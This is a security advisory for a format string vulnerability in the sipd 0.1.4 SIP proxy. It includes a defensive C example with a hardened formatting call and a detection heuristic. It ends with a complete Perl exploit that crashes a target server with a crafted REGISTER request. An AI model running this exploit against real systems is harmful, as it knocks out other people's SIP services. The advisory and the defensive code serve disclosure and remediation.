sipD Format String Vulnerability


sipd is "a high performance, scalable SIP (Session Initiation Protocol) proxy and location server written in C". A format string vulnerability in the product allows remote attackers to cause the server to execute arbitrary code by providing it with a specially crafted SIP request.


SecurITeam would like to thank STORM for finding this vulnerability.


Vulnerable systems:
 * sipd version 0.1.4

Immune systems:
 * sipd version 0.1.5

Vulnerable code:
In strans/strans.c, in the function:
static inline u8_t *strans_hash_key_compat(const msg_t *req, bool_t cancel)

The program calls sapi_saprintf with the Request-URI as the format string and no format arguments:
    /* Request URI */
    tmp = msg_url_str(req->request->url);
    sapi_saprintf(&hkey, tmp);

This means that a Request-URI containing printf-style directives (such as %s or %n) is interpreted as the format string itself, so a remote attacker controls what the printf()-style routine reads and writes, which can crash the server or lead to arbitrary code execution.

Upgrade to version 0.1.5, which is available at: http://www.sxdesign.com/index.php?page=developer&submnu=sipd.
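The hardened form of the hash-key construction, plus a detection heuristic a defender could apply to incoming Request-URIs, as an added example; this is not sipd's own code, and build_hash_key_fixed and uri_has_format_directive are hypothetical names standing in for sapi_saprintf-based code on the page. The fix is the usual one for this bug class: the untrusted string becomes an argument to a fixed "%s" format instead of being the format.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/*
 * Vulnerable pattern from the advisory (shown as a comment, not executed):
 *
 *     sapi_saprintf(&hkey, tmp);        // tmp is the attacker's Request-URI
 *
 * The URI is used as the format string, so any "%..." directive in it is
 * interpreted by the printf-style engine.
 */

/* Hardened form (hypothetical name): the Request-URI is passed as an
 * argument to the constant format "%s", so "%s", "%x" or "%n" inside the URI
 * are copied literally and never interpreted.
 * Returns the number of bytes written (excluding NUL), or -1 on truncation. */
int build_hash_key_fixed(char *dst, size_t dstsz, const char *uri)
{
    int n = snprintf(dst, dstsz, "%s", uri);
    if (n < 0 || (size_t)n >= dstsz)
        return -1;                      /* would not fit: treat as an error */
    return n;
}

/* Detection heuristic (hypothetical name) for logging or an IDS rule:
 * a '%' in a SIP URI that is not a percent-escape (two hex digits, as
 * RFC 3261 allows) is almost certainly a printf-style directive.
 * Returns 1 if such a '%' is present, 0 otherwise. */
int uri_has_format_directive(const char *uri)
{
    for (const char *p = uri; *p; p++) {
        if (*p != '%')
            continue;
        /* "%41" style escapes are legitimate; skip over them */
        if (isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            p += 2;
            continue;
        }
        return 1;                       /* bare '%' or "%s", "%n", ... */
    }
    return 0;
}

int main(void)
{
    char key[128];
    /* constructed sample Request-URI, not taken from real traffic */
    const char *uri = "sip:%s%s%s@example.invalid";

    if (uri_has_format_directive(uri))
        fprintf(stderr, "alert: Request-URI contains printf-style directives\n");
    if (build_hash_key_fixed(key, sizeof key, uri) < 0)
        return 1;
    printf("hash key: %s\n", key);      /* the directives appear verbatim */
    return 0;
}
```

Compiling with -Wformat-security (or -Werror=format-security) flags the vulnerable call shape at build time; the heuristic above is the run-time complement for traffic that reaches an unpatched 0.1.4 server.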


# SIPd - SIP Password Format String
# Kills sipd version 0.1.4 and prior

use IO::Socket;
use strict;
use warnings;

unless (@ARGV == 2 || @ARGV == 3) { die "usage: $0 host your_ip [port]\n" }

my $remote_host = shift(@ARGV);
my $your_host   = shift(@ARGV);
my $port        = shift(@ARGV);
$port = 5060 unless defined $port && $port ne '';

# The Request-URI carries printf-style directives; sipd 0.1.4 passes it to
# sapi_saprintf() as the format string, so the server interprets them.
my $buf = "REGISTER sip:%s%s%s%s%s%s%s%s%s%s%s%s%s%s\@$remote_host SIP/2.0\r
Via: SIP/2.0/UDP $your_host:3277\r
From: \"STORM\" <sip:$your_host:3277>\r
To: <sip:$your_host:3277>\r
Call-ID: 12312312\@$your_host\r
Max-Forwards: 70\r
\r
";

my $socket = IO::Socket::INET->new(Proto => 'udp') or die "Socket error: $@\n";
my $ipaddr = inet_aton($remote_host) or die "Cannot resolve $remote_host\n";
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";

print "Now, '$remote_host' must be dead :)\n";

